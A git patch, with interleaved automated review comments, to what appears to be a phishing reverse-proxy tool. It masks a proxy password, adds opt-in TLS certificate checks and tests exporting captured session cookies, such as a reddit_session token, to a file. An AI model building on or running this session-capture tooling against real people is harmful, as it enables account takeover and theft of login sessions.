From 954b42e104d784857c6ed263ebd3b375836d3453 Mon Sep 17 00:00:00 2001
From: JamesCullum
Date: Fri, 9 Oct 2020 10:06:21 +0200
Subject: [PATCH] Remove full printing of proxy password, test session export to file, allow verifying TLS certificates (opt-in)
---
 .gitignore | 1 +
 core/banner.go | 2 +-
 core/certdb.go | 4 +++-
 core/http_proxy.go | 5 +++--
 core/terminal.go | 10 +++++++++-
 main_test.go | 12 ++++++++++++
 6 files changed, 29 insertions(+), 5 deletions(-)
diff --git a/.gitignore b/.gitignore
index 0ad73d3..df99868 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 phishlets/test-*
 /*.exe
 /tmp_cfg
+/export.json
diff --git a/core/banner.go b/core/banner.go
index 7748695..f58ac35 100644
--- a/core/banner.go
+++ b/core/banner.go
@@ -8,7 +8,7 @@ import (
 )
 const (
- VERSION = "2.4.2"
+ VERSION = "2.4.3"
 )
 func putAsciiArt(s string) {
diff --git a/core/certdb.go b/core/certdb.go
index 742c292..686828e 100644
--- a/core/certdb.go
+++ b/core/certdb.go
@@ -394,7 +394,9 @@ func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, e
 func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
 log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
- config := tls.Config{InsecureSkipVerify: true}
+ config := tls.Config{
+ InsecureSkipVerify: (os.Getenv("VALIDATETLS") != "YES"),
+ }
 conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
 if err != nil {
 log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)
diff --git a/core/http_proxy.go b/core/http_proxy.go
index 25cd000..3b5394d 100644
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
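Review bot: Certificate verification in getServerCertificate stays off unless VALIDATETLS is exactly `YES`, so values such as `yes`, `1` or `true` silently leave `InsecureSkipVerify` enabled, and nothing is logged about which mode is in effect. The same `os.Getenv("VALIDATETLS") != "YES"` expression is repeated in core/http_proxy.go; one helper, for example `func skipTLSVerify() bool { return os.Getenv("VALIDATETLS") != "YES" }` with a doc comment naming the variable and its exact accepted value, would keep the call sites in step. The import block is not part of the hunk, so confirm that `os` is imported in this file. The function body continues past the end of the hunk.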
@@ -1080,6 +1080,7 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte {
 func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (*tls.Config, error) {
 return func(host string, ctx *goproxy.ProxyCtx) (c *tls.Config, err error) {
+ skipVerify := (os.Getenv("VALIDATETLS") != "YES")
 parts := strings.SplitN(host, ":", 2)
 hostname := parts[0]
 port := 443
@@ -1105,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 }
 if cert != nil {
 return &tls.Config{
- InsecureSkipVerify: true,
+ InsecureSkipVerify: skipVerify,
 Certificates: []tls.Certificate{*cert},
 }, nil
 }
@@ -1127,7 +1128,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 return nil, err
 }
 return &tls.Config{
- InsecureSkipVerify: true,
+ InsecureSkipVerify: skipVerify,
 Certificates: []tls.Certificate{*cert},
 }, nil
 }
diff --git a/core/terminal.go b/core/terminal.go
index d150bf3..83e3f5c 100644
--- a/core/terminal.go
+++ b/core/terminal.go
@@ -257,8 +257,16 @@ func (t *Terminal) handleProxy(args []string) error {
 proxy_enabled = "yes"
 }
+ var censoredPassword string
+ for i, passChar := range t.cfg.proxyPassword {
+ appendChar := passChar
+ if i > 2 {
+ appendChar = '*'
+ }
+ censoredPassword = censoredPassword + string(appendChar)
+ }
 keys := []string{"enabled", "type", "address", "port", "username", "password"}
- vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
+ vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, censoredPassword}
 log.Printf("\n%s\n", AsRows(keys, vals))
 return nil
 } else if pn == 1 {
diff --git a/main_test.go b/main_test.go
index 7e588ae..c48e3e3 100644
--- a/main_test.go
+++ b/main_test.go
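Review bot: The `skipVerify` value placed in the two returned `tls.Config` literals (second and third hunks) may have no effect, because both configs carry `Certificates` and no `RootCAs`, which suggests they serve the server side of the intercepted connection, and crypto/tls consults `InsecureSkipVerify` only when acting as a client. If that reading is right, setting VALIDATETLS=YES does not cause any certificate to be verified on this path, and the setting belongs on whatever transport dials the origin, which is not visible here. At minimum the new line should say which connection it governs, e.g. `// skipVerify mirrors VALIDATETLS; only honoured when this config is used as a TLS client`. TLSConfigFromCA's body extends beyond the hunks shown.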
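Review bot: The masked value in handleProxy still discloses the first three characters and the exact length of the proxy password, and a password of three characters or fewer is printed in full, because only positions with `i > 2` are replaced. `i` is a byte offset when ranging over a string, so the number of visible characters also varies for non-ASCII passwords. A fixed mask avoids all of this: `censoredPassword := ""` followed by `if t.cfg.proxyPassword != "" { censoredPassword = "********" }`. handleProxy starts and ends outside the hunk.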
@@ -136,6 +136,18 @@ func TestStart(t *testing.T) {
 terminal.ProcessCommand("sessions 1")
 test.assertLogContains("captured", "Session token captured")
 test.assertLogContains(`","name":"reddit_session","httpOnly":true`, "Session cookie displayed")
+ test.Clear()
+
+ exportPath := path+"/export.json"
+ os.RemoveAll(exportPath)
+ terminal.ProcessCommand("sessions export json "+strings.ReplaceAll(exportPath, `\`, `\\`))
+ test.assertLogContains("exported sessions to json", "Can export sessions to file")
+ time.Sleep(1 * time.Second)
+ readDump, err := ioutil.ReadFile(exportPath)
+ test.outputResult(
+ (err == nil && strings.Contains(string(readDump), `"id":"1"`)),
+ "Dumped sessions are valid",
+ )
 //log.Println(buf.String())
 }
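Review bot: The file written to `exportPath` holds the exported test session and is never removed after the assertion, so it stays on disk between runs (the `/export.json` entry added to .gitignore suggests it lands in the repository root); a `defer os.Remove(exportPath)` right after the `os.RemoveAll(exportPath)` call would clean it up. The fixed `time.Sleep(1 * time.Second)` makes the check timing-dependent: if the export is synchronous the sleep can be dropped, otherwise polling for the file with a deadline is more reliable. `path+"/export.json"` would read better as `filepath.Join(path, "export.json")`, provided path/filepath is imported in this file. TestStart begins and ends outside the hunk.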